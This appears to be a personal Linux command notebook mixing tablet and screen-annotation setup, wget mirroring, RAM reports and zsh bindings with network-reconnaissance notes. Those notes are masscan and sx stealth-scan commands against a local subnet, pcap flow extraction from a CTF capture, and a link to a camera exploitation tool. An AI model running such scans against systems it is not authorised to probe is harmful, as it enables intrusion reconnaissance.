$ sudo masscan 192.168.1.0/24 -p80 Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-06-28 02:26:34 GMT Initiating SYN Stealth Scan Scanning 256 hosts [1 port/host] Discovered open port 80/tcp on 192.168.1.254 Discovered open port 80/tcp on 192.168.1.94
https://www.kitploit.com/2021/06/camover-camera-exploitation-tool-that.html?m=1
pcap_flows: <pcap>> Version: Jun 8 2021 14:28:11 Contact: support at fmad.io Options: --output-tcp <filename> | write TCP output to the specified file name --output-udp <filename> | write UDP output to the specified file name --packet-max <number> | only process the first <number> packets --flow-max <number> | sets max flow count to <number> packets --flow-hash-bits <number> | sets number of bits to use for the flow hash index --extract <number> | extract FlowID <number> into the output PCAP file --extract-port <min port> <max port> | extract ports between min/max --extract-ip <address/netmask> | extract only a subnet --extract-tcp <number> | extract FlowID <number> as a TCP stream to the output file name --extract-tcp-port <min port> <max port> | extract all TCP flows with the specified port in src or dest --extract-tcp-all | extract all TCP flows --disable-tcp-port <min port> <max port> | do not extract TCP ports within this range --stdin | read pcap from stdin. e.g. zcat capture.pcap | pcap_ flow --stdin --flow-packet-min <number> | minimum packet count to display flow info --disable-display | do not display flow information to stdout --cpu <number> | pin thread to a specific CPU --flow-size-min <bytes> | minium file size to flow creation --metamako | decode metamako footer --metamako-double | decode double tagged metamako footer --metamako-offset <bytes> | manual offset for metamako pcap footer --tcpheader | include TCP header in output --udpheader | include UDP header in output ### Examples 1) generate flow information from a compressed PCAP file ... zcat capture.pcap.gz | pcap_flows --stdin ... 2) output a specific flow to a separate PCAP file ... pcap_flows --extract 1234 raw_capture.pcap -o capture_flow_1234.pcap ... 3) extract a TCP stream from a pcap ... pcap_flows --extract-tcp 1234 raw_capture.pcap -o capture_flow_as_tcp1234.pcap ... 3) extract all TCP streams from port 80 to port 80 Note: this can generate a very large number of files (one per stream) in the output directory. e.g. /tmp/tcp_stream_directory/extract_192.168.1.1-80->12345.pcap ... pcap_flows /mnt/capture/hitcon_small.pcap --extract-tcp-port 80 80 -o ./tmp/port80_ $ ls tmp/port80* | wc -l 20217 $ hexdump -Cv "tmp/port80__00:10:18:72:00:3c->e0:3f:49:6a:af:a1_117. 27.153. 29-> 10. 5. 9.102_ 80-> 62374" | head 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d |HTTP/1.1 200 OK.| 00000010 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a |.Server: nginx..| 00000020 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 41 75 |Date: Fri, 08 Au| 00000030 67 20 32 30 31 34 20 31 37 3a 34 39 3a 35 38 20 |g 2014 17:49:58 | 00000040 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 |GMT..Content-Typ| 00000050 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 |e: image/jpeg..C| 00000060 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 |ontent-Length: 1| 00000070 32 32 33 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e |2232..Connection| 00000080 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f |: close..Last-Mo| 00000090 64 69 66 69 65 64 3a 20 54 75 65 2c 20 32 39 20 |dified: Tue, 29 | ... ### TCP Output format The default TCP Output format is a flat linear file of the re-assemabled TCP stream. However with the .--tcpheader. flag each succesfully re-assembled TCP segment contains a header. The header format is: ... typedef struct { u64 TS; // nanoseccond timestamp u16 Length; // number of bytes in this packet u16 StreamID; // unique id per flow } TCPOutputHeader_t; ... This allows parsing a TCP stream is like parsing a UDP packet stream. Each outputed TCP packet is a single reassembled TCP segment written in-order, with no re-sends and no sequence gaps. ### Output Display flow info from hitcon defcon CTF capture ...
pcap_flows /hitcon.pcap --flow-packet-min 1000 1048549 FlowID: 592897 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 17. 2 -> 10. 5. 9. 2 | 43942 -> 8888 | 4,102 Pkts 288,909 Bytes 1048550 FlowID: 761379 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 3. 2 -> 10. 5. 9. 2 | 48716 -> 8888 | 4,113 Pkts 289,197 Bytes 1048551 FlowID: 981924 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 7. 2 -> 10. 5. 9. 2 | 42653 -> 8888 | 4,183 Pkts 294,250 Bytes 1048552 FlowID: 642639 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 17.253. 2.226 | 63281 -> 80 | 4,301 Pkts 295,014 Bytes 1048553 FlowID: 902015 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 12. 2 -> 10. 5. 9. 2 | 36486 -> 8888 | 4,352 Pkts 305,988 Bytes 1048554 FlowID: 53839 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 16. 2 -> 10. 5. 9. 2 | 43103 -> 8888 | 4,715 Pkts 331,990 Bytes 1048555 FlowID: 658515 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 15. 2 -> 10. 5. 9. 2 | 45683 -> 8888 | 4,786 Pkts 337,001 Bytes 1048556 FlowID: 33656 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 130.204. 67.136 -> 10. 5. 9.102 | 9025 -> 56574 | 4,930 Pkts 537,324 Bytes 1048557 FlowID: 643944 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 10. 2 -> 10. 5. 9. 2 | 44934 -> 8888 | 4,995 Pkts 351,892 Bytes 1048558 FlowID: 8462 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 2. 2 -> 10. 5. 9. 2 | 41809 -> 8888 | 5,126 Pkts 360,763 Bytes 1048559 FlowID: 627433 | TCP 00:10:18:72:00:3c -> 00:16:3e:ef:36:38 | 10. 5. 8. 2 -> 10. 5. 9. 2 | 44283 -> 8888 | 5,394 Pkts 379,946 Bytes 1048560 FlowID: 88064 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 140.115. 50. 51 -> 10. 5. 9.102 | 22 -> 42271 | 6,102 Pkts 417,083 Bytes 1048561 FlowID: 24006 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 74.125.129.189 -> 10. 5. 9.102 | 443 -> 61860 | 6,502 Pkts 658,192 Bytes 1048562 FlowID: 785299 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 10. 5. 6.108 -> 10. 5. 9.102 | 80 -> 53303 | 6,559 Pkts 9,849,540 Bytes 1048563 FlowID: 23999 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 74.125.129.189 | 61860 -> 443 | 6,588 Pkts 2,583,463 Bytes 1048564 FlowID: 33651 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 130.204. 67.136 | 56574 -> 9025 | 6,609 Pkts 622,258 Bytes 1048565 FlowID: 1005605 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 10. 5. 6.108 | 63779 -> 80 | 7,149 Pkts 453,291 Bytes 1048566 FlowID: 786260 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 10. 5. 6.108 -> 10. 5. 9.102 | 80 -> 53413 | 8,367 Pkts 12,625,278 Bytes 1048567 FlowID: 642795 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 54.183.128. 64 | 52940 -> 22222 | 10,502 Pkts 2,409,657 Bytes 1048568 FlowID: 88059 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 140.115. 50. 51 | 42271 -> 22 | 10,955 Pkts 16,496,355 Bytes 1048569 FlowID: 1 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 54.183.128. 64 | 51697 -> 22222 | 11,666 Pkts 3,839,832 Bytes 1048570 FlowID: 1005606 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 10. 5. 6.108 -> 10. 5. 9.102 | 80 -> 63779 | 14,670 Pkts 21,774,873 Bytes 1048571 FlowID: 2 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 54.183.128. 64 -> 10. 5. 9.102 | 22222 -> 51697 | 16,714 Pkts 1,830,744 Bytes 1048572 FlowID: 642798 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 54.183.128. 64 -> 10. 5. 9.102 | 22222 -> 52940 | 16,997 Pkts 1,921,123 Bytes 1048573 FlowID: 642638 | TCP e0:3f:49:6a:af:a1 -> 00:10:18:72:00:3c | 10. 5. 9.102 -> 17.253. 2.226 | 63280 -> 80 | 98,135 Pkts 6,584,162 Bytes 1048574 FlowID: 642642 | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 17.253. 2.226 -> 10. 5. 9.102 | 80 -> 63280 | 115,911 Pkts 245,630,927 Bytes ...
Extract only port 80 traffic from hitcon.pcap to a separate file. This is the individual TCP port 80 -> 63280 flow. 1048574 **FlowID: 642642** | TCP 00:10:18:72:00:3c -> e0:3f:49:6a:af:a1 | 17.253. 2.226 -> 10. 5. 9.102 | 80 -> 63280 | 115,911 Pkts 245,630,927 Bytes ... $ pcap_flows hitcon.pcap --extract 642642 -o /mnt/capture/hitcon_http.pcap --disable-display writing PCAP to [/mnt/capture/hitcon_http.pcap] [/mnt/capture/hitcon_small.pcap] FileSize: 2GB [02:00:30.000.332.313 0.000%] Flows:2 0.00M Pkts 0.000Gbps : 0.00GB Out:0.00GB [05:10:22.000.316.568 0.307%] Flows:899478 2.66M Pkts 7.419Gbps : 0.79GB Out:0.25GB [02:27:22.000.060.690 0.816%] Flows:1048576 9.71M Pkts 12.695Gbps : 2.16GB Out:0.25GB ...
The Wacom pad allows me to draw with a stylus. I use the Gromit-MPX program to draw anywhere on the screen.
$ xsetwacom Usage: xsetwacom [options] [command [arguments...]] Options: -h, --help - usage -v, --verbose - verbose output -V, --version - version info -d, --display "display" - override default display -s, --shell - generate shell commands for 'get' -x, --xconf - generate xorg.conf lines for 'get' Commands: --list devices - display detected devices --list parameters - display supported parameters --list modifiers - display supported modifier and specific keys for keystrokes --set "device name" parameter [values...] - set device parameter by name --get "device name" parameter [param...] - get current device parameter(s) value by name $ xsetwacom --list devices Wacom One by Wacom S Pen stylus id: 17 type: STYLUS Wacom One by Wacom S Pen eraser id: 18 type: ERASER $ xsetwacom --list parameters Area - Valid tablet area in device coordinates. Button - X11 event to which the given button should be mapped. ToolDebugLevel - Level of debugging trace for individual tools (default is 0 [off]). TabletDebugLevel - Level of debugging statements applied to shared code paths between all tools associated with the same tablet (default is 0 [off]). Suppress - Number of points trimmed (default is 2). RawSample - Number of raw data used to filter the points (default is 4). PressureCurve - Bezier curve for pressure (default is 0 0 100 100 [linear]). Mode - Switches cursor movement mode (default is absolute). TabletPCButton - Turns on/off Tablet PC buttons (default is off for regular tablets, on for Tablet PC). Touch - Turns on/off Touch events (default is on). HWTouchSwitchState - Touch events turned on/off by hardware switch. Gesture - Turns on/off multi-touch gesture events (default is on). ZoomDistance - Minimum distance for a zoom gesture (default is 50). ScrollDistance - Minimum motion before sending a scroll gesture (default is 20). TapTime - Minimum time between taps for a right click (default is 250). CursorProximity - Sets cursor distance for proximity-out in distance from the tablet (default is 10 for Intuos series, 42 for Graphire series). Rotate - Sets the rotation of the tablet. Values = none, cw, ccw, half (default is none). RelWheelUp - X11 event to which relative wheel up should be mapped. RelWheelDown - X11 event to which relative wheel down should be mapped. AbsWheelUp - X11 event to which absolute wheel up should be mapped. AbsWheelDown - X11 event to which absolute wheel down should be mapped. AbsWheel2Up - X11 event to which absolute wheel up should be mapped. AbsWheel2Down - X11 event to which absolute wheel down should be mapped. StripLeftUp - X11 event to which left strip up should be mapped. StripLeftDown - X11 event to which left strip down should be mapped. StripRightUp - X11 event to which right strip up should be mapped. StripRightDown - X11 event to which right strip down should be mapped. Threshold - Sets tip/eraser pressure threshold (default is 27). ResetArea - Resets the bounding coordinates to default in tablet units. ToolType - Returns the tool type of the associated device. ToolSerial - Returns the serial number of the current device in proximity. ToolID - Returns the tool ID of the current tool in proximity. ToolSerialPrevious - Returns the serial number of the previous device in proximity. BindToSerial - Binds this device to the serial number. TabletID - Returns the tablet ID of the associated device. PressureRecalibration - Turns on/off Tablet pressure recalibration MapToOutput - Map the device to the given output. all - Get value for all parameters. $ xsetwacom --get 'Wacom One by Wacom S Pen stylus' all Option "Area" "0 0 15200 9500" Button: Actions are not supported by xorg.conf. Try shell format (-s) instead. Button: Actions are not supported by xorg.conf. Try shell format (-s) instead. Button: Actions are not supported by xorg.conf. Try shell format (-s) instead. Option "DebugLevel" "0" Option "CommonDBG" "0" Option "Suppress" "2" Option "RawSample" "4" Option "PressCurve" "0 0 100 100" Option "Mode" "Absolute" Option "TPCButton" "off" Option "Touch" "off" Property 'Wacom Hardware Touch Switch' does not exist on device. Option "Gesture" "off" Option "ZoomDistance" "0" Option "ScrollDistance" "0" Option "TapTime" "250" Property 'Wacom Proximity Threshold' does not exist on device. Option "Rotate" "none" Property 'Wacom Wheel Buttons' does not exist on device. Property 'Wacom Wheel Buttons' does not exist on device. Property 'Wacom Wheel Buttons' does not exist on device. Property 'Wacom Wheel Buttons' does not exist on device. Property 'Wacom Wheel Buttons' does not exist on device. Property 'Wacom Wheel Buttons' does not exist on device. Property 'Wacom Strip Buttons' does not exist on device. Property 'Wacom Strip Buttons' does not exist on device. Property 'Wacom Strip Buttons' does not exist on device. Property 'Wacom Strip Buttons' does not exist on device. Option "Threshold" "26" Option "Serial" "0" Option "PressureRecalibration" "on" ┌──(parth㉿parth)-[/etc/X11] $ sudo xinput list ⎡ Virtual core pointer id=2 [master pointer (3)] ⎜ ↳ Virtual core XTEST pointer id=4 [slave pointer (2)] ⎜ ↳ Logitech M510 id=9 [slave pointer (2)] ⎜ ↳ DELL09F5:00 04F3:30CB Mouse id=11 [slave pointer (2)] ⎜ ↳ DELL09F5:00 04F3:30CB Touchpad id=12 [slave pointer (2)] ⎜ ↳ ETPS/2 Elantech Touchpad id=15 [slave pointer (2)] ⎜ ↳ Wacom One by Wacom S Pen stylus id=17 [slave pointer (2)] ⎜ ↳ Wacom One by Wacom S Pen eraser id=18 [slave pointer (2)] ⎣ Virtual core keyboard id=3 [master keyboard (2)] ↳ Virtual core XTEST keyboard id=5 [slave keyboard (3)] ↳ Video Bus id=6 [slave keyboard (3)] ↳ Power Button id=7 [slave keyboard (3)] ↳ Sleep Button id=8 [slave keyboard (3)] ↳ Integrated_Webcam_HD: Integrate id=10 [slave keyboard (3)] ↳ Dell WMI hotkeys id=13 [slave keyboard (3)] ↳ AT Translated Set 2 keyboard id=14 [slave keyboard (3)] ↳ DELL Wireless hotkeys id=16 [slave keyboard (3)] This example shows that 'eDP' is my wacom tablet. $ xrandr Screen 0: minimum 320 x 200, current 1920 x 1080, maximum 16384 x 16384 eDP connected primary 1920x1080+0+0 (normal left inverted right x axis y axis) 344mm x 194mm 1920x1080 120.00*+ 60.01 1680x1050 120.00 1280x1024 120.00 1440x900 120.00 1280x800 120.00 1280x720 120.00 1024x768 120.00 800x600 120.00 640x480 120.00 DisplayPort-1 disconnected (normal left inverted right x axis y axis) (Ref https://askubuntu.com/questions/839161/limit-a-graphics-tablet-to-one-monitor) Map the all Wacom devices to your desired monitor. xsetwacom set 'Wacom One by Wacom S Pen stylus' MapToOutput eDP xsetwacom set 'Wacom One by Wacom S Pen eraser' MapToOutput eDP
The xsetwacom syntax
The syntax of xsetwacom is flexible but not very well documented. The general mapping syntax (extracted from the source code) for xsetwacom 0.17.0 is the following.
KEYWORD [ARGS...] [KEYWORD [ARGS...] ...] KEYWORD + ARGS: key [+,-]KEY [[+,-]KEY ...] where +:key down, -:key up, no prefix:down and up button BUTTON [BUTTON ...] (1=left,2=middle,3=right mouse button, 4/5 scroll mouse wheel) modetoggle toggle absolute/relative tablet mode displaytoggle toggle cursor movement among all displays which include individual screens plus the whole desktop for the selected tool if it is not a pad. When the tool is a pad, the function applies to all tools that are asssociated with the tablet BUTTON: button ID as integer number KEY: MODIFIER, SPECIALKEY or ASCIIKEY MODIFIER: (each can be prefix with an l or an r for the left/right modifier (no prefix = left) ctrl=ctl=control, meta, alt, shift, super, hyper SPECIALKEY: f1-f35, esc=Esc, up,down,left,right, backspace=Backspace, tab, PgUp,PgDn ASCIIKEY: (usual characters the key produces, e.g. a,b,c,1,2,3 etc.) Some examples $ xsetwacom set pad Button 1 3 # right mouse button $ xsetwacom set pad Button 1 "key +ctrl z -ctrl" $ xsetwacom get pad Button 1 key +Control_L +z -z -Control_L $ xsetwacom set pad Button 1 "key +shift button 1 key -shift" If you want to bind your tablet buttons to different shortcuts in different applications, you may want to map your tablet buttons to function keys because applications generally do not let you bind keyboard shortcuts to mouse buttons. Firstly, map the pad buttons to mouse buttons 11 and higher so that you can distinguish them from regular mouse buttons. For example: xsetwacom set pad Button 1 11 xsetwacom set pad Button 2 12 ... Then map the mouse buttons to the function keys. This can be done with xbindkeys and xdotool by adding an entry like the following for every pad to your ~/.xbindkeysrc: "xdotool key F21" b:11 "xdotool key F22" b:12 ... Find out your tablet's resolution by running: $ xsetwacom get 'Wacom One by Wacom S Pen stylus' Area 0 0 15200 9500 Permanent configuration Note: Because xorg.conf lacks options xsetwacom has and only lets you map buttons to mouse buttons, you may want to autostart a script with xsetwacom commands instead of using xorg.conf. Configuration can be made persistent in xorg.conf and xorg.conf(5). You firstly need to find out your product names in the Xorg log file: $ grep "Using input driver 'wacom'" ~/.local/share/xorg/Xorg.0.log
In order to draw on the entire screen, I installed Gromit-MPX 1.4. Below are the hotkeys. I used apt to install it. But the homepage is https://github.com/bk138/gromit-mpx
Gromit-MPX Toggle paint Home Clear screan Shift-Home Toggle visibility Ctrl-Home quit Alt-Home undo last End redo last undo Shift-End You can specify the keys to grab as hotkeys via: gromit-mpx --key <keysym> --undo-key <keysym> You can specify the opacity simply via: gromit-mpx -o <opacity as real value in [0,1]>
You can set preferences in the cfg file (/etc/gromit-mpx/gromit-mpx.cfg)
If you want another minimum size instead of the default 1, add minsize like this:
You can set a maximum size as well:
You can also draw lines that end in an arrow head. For this you have to specify arrowsize. This is a factor relative to the width of the line. For reasonable arrowheads start with 1.
Additionally you can limit the Scope to specific combinations of Mousebuttons (1,2,3,4,5 or Button1,...,Button5) and Modifiers (SHIFT, CONTROL, ALT, META, while ALT==META).
If you want to have Gromit-MPX autostarted for your desktop session, the safest way to do so is via the XDG autostart facility:
Simply create a file ~/.config/autostart/gromit-mpx.desktop with the following contents:
[Desktop Entry] Type=Application Exec=gromit-mpx
Here are some usage examples to download an entire site: convert links for local viewing: wget --mirror --convert-links --page-requisites ----no-parent -P /path/to/download/to https://example-domain.com without converting: wget --mirror --page-requisites ----no-parent -P /path/to/download/to https://example-domain.com One more example to download an entire site with wget: wget --mirror --convert-links --adjust-extension --page-requisites --no-parent http://example.org Explanation of the various flags: --mirror – Makes (among other things) the download recursive. --convert-links – convert all the links (also to stuff like CSS stylesheets) to relative, so it will be suitable for offline viewing. --adjust-extension – Adds suitable extensions to filenames (html or css) depending on their content-type. --page-requisites – Download things like CSS style-sheets and images required to properly display the page offline. --no-parent – When recursing do not ascend to the parent directory. It useful for restricting the download to only a portion of the site. wget --mirror --convert-links --page-requisites ----no-parent -P /home/parth/JDW/website https://leadershipethicsonline.com Ref https://gist.github.com/mikecrittenden/fe02c59fed1aeebd0a9697cf7e9f5c0c
$ sudo sx help Fast, modern, easy-to-use network scanner Usage: sx [command] Available Commands: arp Perform ARP scan docker Perform Docker scan elastic Perform Elasticsearch scan help Help about any command icmp Perform ICMP scan socks Perform SOCKS5 scan tcp Perform TCP scan udp Perform UDP scan Flags: -h, --help help for sx Use "sx [command] --help" for more information about a command. Usage: sx tcp [flags] subnet sx tcp [command] Examples: tcp -p 22 192.168.0.1/24 tcp -p 22-4567 10.0.0.1 tcp --flags fin,ack -p 22 192.168.0.3 Available Commands: fin Perform TCP FIN scan null Perform TCP NULL scan syn Perform TCP SYN scan xmas Perform TCP Xmas scan Flags: -a, --arp-cache string set ARP cache file reads from stdin by default --exclude string set file with IPs or subnets in CIDR notation to exclude, one-per line. It is useful to exclude RFC 1918 addresses, multicast, IANA reserved space, and other IANA special-purpose addresses. --exit-delay duration set exit delay to wait for last response packets any expression accepted by time.ParseDuration is valid (default 300ms) -f, --file string set JSONL file with IPs to scan --flags string set TCP flags --gwmac string set gateway MAC address to send generated packets to -h, --help help for tcp -i, --iface string set interface to send/receive packets --json enable JSON output -p, --ports string set ports to scan -r, --rate string set rate limit for generated packets format: "rateCount/rateWindow" where rateCount is a number of packets, rateWindow is the time interval e.g. 1000/s -- 1000 packets per second 500/7s -- 500 packets per 7 seconds --srcip ip set source IP address for generated packets --srcmac string set source MAC address for generated packets Use "sx tcp [command] --help" for more information about a command. sudo sx -p 2-1024 192.168.1.0/24 sudo sx arp 192.168.1.0/24
The following are ways to report the different characteristics of installed RAM
Note that the first report was with 16GB of RAM installed. The Second is immeadiatly after installing a total of 32GB.
$ sudo dmidecode --type memory # dmidecode 3.3 Getting SMBIOS data from sysfs. SMBIOS 3.2.0 present. Handle 0x0021, DMI type 16, 23 bytes Physical Memory Array Location: System Board Or Motherboard Use: System Memory Error Correction Type: None Maximum Capacity: 64 GB Error Information Handle: 0x0024 Number Of Devices: 2 Handle 0x0022, DMI type 17, 84 bytes Memory Device Array Handle: 0x0021 Error Information Handle: 0x0025 Total Width: 64 bits Data Width: 64 bits Size: 8 GB Form Factor: SODIMM Set: None Locator: DIMM 0 Bank Locator: P0 CHANNEL A Type: DDR4 Type Detail: Synchronous Unbuffered (Unregistered) Speed: 3200 MT/s Manufacturer: 80CE000080CE Serial Number: 18C15026 Asset Tag: 03210700 Part Number: M471A1G44AB0-CWE Rank: 1 Configured Memory Speed: 3200 MT/s Minimum Voltage: 1.2 V Maximum Voltage: 1.2 V Configured Voltage: 1.2 V Memory Technology: DRAM Memory Operating Mode Capability: Volatile memory Firmware Version: M471A1G44AB0-CWE Module Manufacturer ID: Bank 1, Hex 0xCE Module Product ID: Unknown Memory Subsystem Controller Manufacturer ID: Unknown Memory Subsystem Controller Product ID: Unknown Non-Volatile Size: None Volatile Size: 8 GB Cache Size: None Logical Size: None Handle 0x0023, DMI type 17, 84 bytes Memory Device Array Handle: 0x0021 Error Information Handle: 0x0026 Total Width: 64 bits Data Width: 64 bits Size: 8 GB Form Factor: SODIMM Set: None Locator: DIMM 0 Bank Locator: P0 CHANNEL B Type: DDR4 Type Detail: Synchronous Unbuffered (Unregistered) Speed: 3200 MT/s Manufacturer: 80CE000080CE Serial Number: 18C15025 Asset Tag: 03210700 Part Number: M471A1G44AB0-CWE Rank: 1 Configured Memory Speed: 3200 MT/s Minimum Voltage: 1.2 V Maximum Voltage: 1.2 V Configured Voltage: 1.2 V Memory Technology: DRAM Memory Operating Mode Capability: Volatile memory Firmware Version: M471A1G44AB0-CWE Module Manufacturer ID: Bank 1, Hex 0xCE Module Product ID: Unknown Memory Subsystem Controller Manufacturer ID: Unknown Memory Subsystem Controller Product ID: Unknown Non-Volatile Size: None Volatile Size: 8 GB Cache Size: None Logical Size: None
Now for the new memory at 32GB
$ sudo dmidecode --type memory [sudo] password for parth: # dmidecode 3.3 Getting SMBIOS data from sysfs. SMBIOS 3.2.0 present. Handle 0x0021, DMI type 16, 23 bytes Physical Memory Array Location: System Board Or Motherboard Use: System Memory Error Correction Type: None Maximum Capacity: 64 GB Error Information Handle: 0x0024 Number Of Devices: 2 Handle 0x0022, DMI type 17, 84 bytes Memory Device Array Handle: 0x0021 Error Information Handle: 0x0025 Total Width: 64 bits Data Width: 64 bits Size: 16 GB Form Factor: SODIMM Set: None Locator: DIMM 0 Bank Locator: P0 CHANNEL A Type: DDR4 Type Detail: Synchronous Unbuffered (Unregistered) Speed: 3200 MT/s Manufacturer: 859B0000802C Serial Number: E53EFF6A Asset Tag: 1A211800 Part Number: CT16G4SFRA32A.M16FRS Rank: 2 Configured Memory Speed: 3200 MT/s Minimum Voltage: 1.2 V Maximum Voltage: 1.2 V Configured Voltage: 1.2 V Memory Technology: DRAM Memory Operating Mode Capability: Volatile memory Firmware Version: CT16G4SFRA32A.M16FRS Module Manufacturer ID: Bank 6, Hex 0x9B Module Product ID: Unknown Memory Subsystem Controller Manufacturer ID: Unknown Memory Subsystem Controller Product ID: Unknown Non-Volatile Size: None Volatile Size: 16 GB Cache Size: None Logical Size: None Handle 0x0023, DMI type 17, 84 bytes Memory Device Array Handle: 0x0021 Error Information Handle: 0x0026 Total Width: 64 bits Data Width: 64 bits Size: 16 GB Form Factor: SODIMM Set: None Locator: DIMM 0 Bank Locator: P0 CHANNEL B Type: DDR4 Type Detail: Synchronous Unbuffered (Unregistered) Speed: 3200 MT/s Manufacturer: 859B0000802C Serial Number: E53EFE4C Asset Tag: 1A211800 Part Number: CT16G4SFRA32A.M16FRS Rank: 2 Configured Memory Speed: 3200 MT/s Minimum Voltage: 1.2 V Maximum Voltage: 1.2 V Configured Voltage: 1.2 V Memory Technology: DRAM Memory Operating Mode Capability: Volatile memory Firmware Version: CT16G4SFRA32A.M16FRS Module Manufacturer ID: Bank 6, Hex 0x9B Module Product ID: Unknown Memory Subsystem Controller Manufacturer ID: Unknown Memory Subsystem Controller Product ID: Unknown Non-Volatile Size: None Volatile Size: 16 GB Cache Size: None Logical Size: None
Gromit-MPX enables you to make multi-pointer annotations on your screen. It can run in the background and be activated on demand to let you draw over all your currently run‐ ning applications. The drawing will stay on screen as long as you want, you can con‐ tinue to use your applications while the drawing is visible.
$ cat /etc/gromit-mpx/gromit-mpx.cfg # Default gromit-mpx configuration # taken from Totem's telestrator mode config # added default entries # Uncomment to set Hot key and/or Undo key to a custom value. Note # that you can only specify single keysyms, not key combos. # HOTKEY = "F9"; # UNDOKEY = "F8"; "red Pen" = PEN (size=5 color="red"); "blue Pen" = "red Pen" (color="blue"); "yellow Pen" = "red Pen" (color="yellow"); "green Marker" = PEN (size=6 color="green" arrowsize=1); "Eraser" = ERASER (size = 75); "default" = "red Pen"; "default"[SHIFT] = "blue Pen"; "default"[CONTROL] = "yellow Pen"; "default"[2] = "green Marker"; "default"[Button3] = "Eraser";
To display all key bindings for bash;
┌──(parth㉿parth)-[~/Downloads] $ bind -P
To display all key bindings for zsh;
┌──(parth㉿parth)-[~/Downloads] $ bindkey "^@" set-mark-command "^A" beginning-of-line "^B" backward-char "^D" delete-char-or-list "^E" end-of-line "^F" forward-char "^G" send-break "^H" backward-delete-char "^I" expand-or-complete "^J" accept-line "^K" kill-line "^L" clear-screen "^M" accept-line "^N" down-line-or-history "^O" accept-line-and-down-history "^P" toggle_oneline_prompt "^Q" push-line "^R" history-incremental-search-backward "^S" history-incremental-search-forward "^T" transpose-chars "^U" kill-whole-line "^V" quoted-insert "^W" backward-kill-word "^X^B" vi-match-bracket "^X^F" vi-find-next-char "^X^J" vi-join "^X^K" kill-buffer "^X^N" infer-next-history "^X^O" overwrite-mode "^X^R" _read_comp "^X^U" undo "^X^V" vi-cmd-mode "^X^X" exchange-point-and-mark "^X*" expand-word "^X=" what-cursor-position "^X?" _complete_debug "^XC" _correct_filename "^XG" list-expand "^Xa" _expand_alias "^Xc" _correct_word "^Xd" _list_expansions "^Xe" _expand_word "^Xg" list-expand "^Xh" _complete_help "^Xm" _most_recent_file "^Xn" _next_tags "^Xr" history-incremental-search-backward "^Xs" history-incremental-search-forward "^Xt" _complete_tag "^Xu" undo "^X~" _bash_list-choices "^Y" yank "^[^D" list-choices "^[^G" send-break "^[^H" backward-kill-word "^[^I" self-insert-unmeta "^[^J" self-insert-unmeta "^[^L" clear-screen "^[^M" self-insert-unmeta "^[^_" copy-prev-word "^[ " expand-history "^[!" expand-history "^[\"" quote-region "^[\$" spell-word "^['" quote-line "^[," _history-complete-newer "^[-" neg-argument "^[." insert-last-word "^[/" _history-complete-older "^[0" digit-argument "^[1" digit-argument "^[2" digit-argument "^[3" digit-argument "^[4" digit-argument "^[5" digit-argument "^[6" digit-argument "^[7" digit-argument "^[8" digit-argument "^[9" digit-argument "^[<" beginning-of-buffer-or-history "^[>" end-of-buffer-or-history "^[?" which-command "^[A" accept-and-hold "^[B" backward-word "^[C" capitalize-word "^[D" kill-word "^[F" forward-word "^[G" get-line "^[H" run-help "^[L" down-case-word "^[N" history-search-forward "^[OA" up-line-or-history "^[OB" down-line-or-history "^[OC" forward-char "^[OD" backward-char "^[OF" end-of-line "^[OH" beginning-of-line "^[P" history-search-backward "^[Q" push-line "^[S" spell-word "^[T" transpose-words "^[U" up-case-word "^[W" copy-region-as-kill "^[[1;5C" forward-word "^[[1;5D" backward-word "^[[200~" bracketed-paste "^[[2~" overwrite-mode "^[[3;5~" kill-word "^[[3~" delete-char "^[[5~" beginning-of-buffer-or-history "^[[6~" end-of-buffer-or-history "^[[A" up-line-or-history "^[[B" down-line-or-history "^[[C" forward-char "^[[D" backward-char "^[[F" end-of-line "^[[H" beginning-of-line "^[[Z" undo "^[_" insert-last-word "^[a" accept-and-hold "^[b" backward-word "^[c" capitalize-word "^[d" kill-word "^[f" forward-word "^[g" get-line "^[h" run-help "^[l" down-case-word "^[n" history-search-forward "^[p" history-search-backward "^[q" push-line "^[s" spell-word "^[t" transpose-words "^[u" up-case-word "^[w" copy-region-as-kill "^[x" execute-named-cmd "^[y" yank-pop 